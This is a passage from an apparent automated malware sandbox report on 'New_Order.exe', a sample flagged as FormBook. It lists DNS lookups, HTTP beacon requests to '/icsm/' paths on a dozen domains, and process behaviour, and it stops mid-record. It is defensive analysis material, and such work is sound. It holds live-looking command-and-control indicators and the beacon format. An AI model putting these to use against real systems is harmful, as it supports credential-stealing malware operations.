                                                                      May 12, 2021 06:10:57.795087099 CEST192.168.2.58.8.8.80xe9ddStandard query (0)www.voiceclubdubai.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:03.061557055 CEST192.168.2.58.8.8.80x469bStandard query (0)www.w-c727or.netA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:08.172087908 CEST192.168.2.58.8.8.80xbc63Standard query (0)www.geacasolaro.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:13.373060942 CEST192.168.2.58.8.8.80x4d71Standard query (0)www.charmboutiques.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.654652119 CEST192.168.2.58.8.8.80x3c70Standard query (0)www.websitemax.co.ukA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:23.877700090 CEST192.168.2.58.8.8.80x73a4Standard query (0)www.year-action.xyzA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:29.830585957 CEST192.168.2.58.8.8.80x6819Standard query (0)www.hdjakdhf.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:35.455265045 CEST192.168.2.58.8.8.80xa038Standard query (0)www.kantan-sedori.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:40.564667940 CEST192.168.2.58.8.8.80x59cbStandard query (0)www.shanghainternational.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:45.658201933 CEST192.168.2.58.8.8.80x88a8Standard query (0)www.susanestuart.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:50.920507908 CEST192.168.2.58.8.8.80x80deStandard query (0)www.algaeflipflops.comA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:56.217856884 CEST192.168.2.58.8.8.80x2892Standard query (0)www.thelordnelsonwinthorpe.comA (IP address)IN (0x0001)

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                      May 12, 2021 06:10:52.571346045 CEST8.8.8.8192.168.2.50xbbd8No error (0)www.roastedorganic.com75.2.115.196A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:10:57.885720015 CEST8.8.8.8192.168.2.50xe9ddNo error (0)www.voiceclubdubai.comvoiceclubdubai.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:10:57.885720015 CEST8.8.8.8192.168.2.50xe9ddNo error (0)voiceclubdubai.com91.148.168.141A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:03.124828100 CEST8.8.8.8192.168.2.50x469bName error (3)www.w-c727or.netnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:08.245578051 CEST8.8.8.8192.168.2.50xbc63No error (0)www.geacasolaro.com62.149.189.71A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:13.436161995 CEST8.8.8.8192.168.2.50x4d71No error (0)www.charmboutiques.comcharmbracelet-shop.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:13.436161995 CEST8.8.8.8192.168.2.50x4d71No error (0)charmbracelet-shop.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:13.436161995 CEST8.8.8.8192.168.2.50x4d71No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)www.websitemax.co.ukwebforward.lcn.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)webforward.lcn.comfwd3.hosts.co.ukCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)fwd3.hosts.co.uk85.233.160.22A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)fwd3.hosts.co.uk85.233.160.24A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:18.741679907 CEST8.8.8.8192.168.2.50x3c70No error (0)fwd3.hosts.co.uk85.233.160.23A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:24.163995981 CEST8.8.8.8192.168.2.50x73a4No error (0)www.year-action.xyz150.95.255.38A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:29.892627001 CEST8.8.8.8192.168.2.50x6819No error (0)www.hdjakdhf.com8.210.40.49A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:35.520087004 CEST8.8.8.8192.168.2.50xa038Name error (3)www.kantan-sedori.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:40.639816046 CEST8.8.8.8192.168.2.50x59cbName error (3)www.shanghainternational.comnonenoneA (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:45.726883888 CEST8.8.8.8192.168.2.50x88a8No error (0)www.susanestuart.comsusanestuart.comCNAME (Canonical name)IN (0x0001)
                                                                      May 12, 2021 06:11:45.726883888 CEST8.8.8.8192.168.2.50x88a8No error (0)susanestuart.com34.102.136.180A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:51.080497026 CEST8.8.8.8192.168.2.50x80deNo error (0)www.algaeflipflops.com64.190.62.111A (IP address)IN (0x0001)
                                                                      May 12, 2021 06:11:56.303303003 CEST8.8.8.8192.168.2.50x2892No error (0)www.thelordnelsonwinthorpe.com94.136.40.51A (IP address)IN (0x0001)

                                                                      HTTP Request Dependency Graph

                                                                      • www.roastedorganic.com
                                                                      • www.voiceclubdubai.com
                                                                      • www.geacasolaro.com
                                                                      • www.charmboutiques.com
                                                                      • www.websitemax.co.uk
                                                                      • www.year-action.xyz
                                                                      • www.hdjakdhf.com
                                                                      • www.susanestuart.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      0192.168.2.54971675.2.115.19680C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:10:52.620214939 CEST1331OUTGET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.roastedorganic.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:10:52.777667046 CEST1332INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:10:52 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.54971791.148.168.14180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:10:57.964154959 CEST1333OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1
                                                                      Host: www.voiceclubdubai.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:10:58.051840067 CEST1333INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:10:58 GMT
                                                                      Server: Apache
                                                                      Content-Length: 318
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      2192.168.2.54971862.149.189.7180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:08.305753946 CEST1334OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1
                                                                      Host: www.geacasolaro.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:08.363512993 CEST1335INHTTP/1.1 404 Not Found
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 04:11:08 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Content-Length: 253
                                                                      Connection: close
                                                                      X-Varnish: 824312071
                                                                      Retry-After: 5
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 38 32 34 33 31 32 30 37 31 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      3192.168.2.54971923.227.38.7480C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:13.482528925 CEST1336OUTGET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.charmboutiques.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:13.647634983 CEST1337INHTTP/1.1 403 Forbidden
                                                                      Date: Wed, 12 May 2021 04:11:13 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      X-Sorting-Hat-PodId: 163
                                                                      X-Sorting-Hat-ShopId: 46720286884
                                                                      X-Dc: gcp-us-central1
                                                                      X-Request-ID: 8ba024b4-24d2-42c4-a108-db837ba28889
                                                                      X-XSS-Protection: 1; mode=block
                                                                      X-Download-Options: noopen
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                      CF-Cache-Status: DYNAMIC
                                                                      cf-request-id: 0a005e9cec00004a5bb7b08000000001
                                                                      Server: cloudflare
                                                                      CF-RAY: 64e0cd417cd24a5b-FRA
                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      4192.168.2.54972085.233.160.2280C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:18.796605110 CEST1343OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1
                                                                      Host: www.websitemax.co.uk
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:18.849797010 CEST1344INHTTP/1.1 200 OK
                                                                      Date: Wed, 12 May 2021 04:11:18 GMT
                                                                      Server: Apache
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 31 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 77 65 62 73 69 74 65 6d 61 78 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 62 6f 64 79 2c 20 68 74 6d 6c 0a 09 7b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 7d 0a 09 23 63 6f 6e 74 65 6e 74 0a 09 7b 0a 09 09 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 20 30 3b 20 72 69 67 68 74 3a 20 30 3b 20 62 6f 74 74 6f 6d 3a 20 30 3b 20 74 6f 70 3a 20 30 70 78 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 3c 69 66 72 61 6d 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 63 6e 2e 63 6f 6d 2f 70 61 72 6b 65 64 2d 64 6f 6d 61 69 6e 73 2f 69 6e 64 65 78 3f 2f 3d 2f 64 6f 6d 61 69 6e 2f 77 65 62 73 69 74 65 6d 61 78 2e 63 6f 2e 75 6b 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1e9<!DOCTYPE html><html><head><title>websitemax.co.uk</title><style type="text/css">body, html{margin: 0; padding: 0; height: 100%; overflow: hidden;}#content{position:absolute; left: 0; right: 0; bottom: 0; top: 0px;}</style><meta name="robots" content="noindex, nofollow"></head><body><div id="content"><iframe width="100%" height="100%" frameborder="0" src="https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk"></iframe></div></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.549724150.95.255.3880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:24.480335951 CEST2828OUTGET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.year-action.xyz
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:24.793498039 CEST3343INHTTP/1.1 302 Found
                                                                      Date: Wed, 12 May 2021 04:11:24 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                      Location: http://dfltweb1.onamae.com
                                                                      Content-Length: 210
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      6192.168.2.5497258.210.40.4980C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:30.171286106 CEST5182OUTGET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1
                                                                      Host: www.hdjakdhf.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:30.448025942 CEST5182INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Wed, 12 May 2021 04:11:30 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      7192.168.2.54972734.102.136.18080C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:45.772072077 CEST5217OUTGET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.susanestuart.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      May 12, 2021 06:11:45.909532070 CEST5217INHTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 04:11:45 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953da-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: New_Order.exe PID: 6216 Parent PID: 5672

                                                                      General

                                                                      Start time:06:09:42
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\New_Order.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x400000
                                                                      File size:344003 bytes
                                                                      MD5 hash:74E4EB9AFBF8F9C9B285A46CED831979
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Analysis Process: svchost.exe PID: 6252 Parent PID: 6216

                                                                      General

                                                                      Start time:06:09:43
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x180000
                                                                      File size:44520 bytes
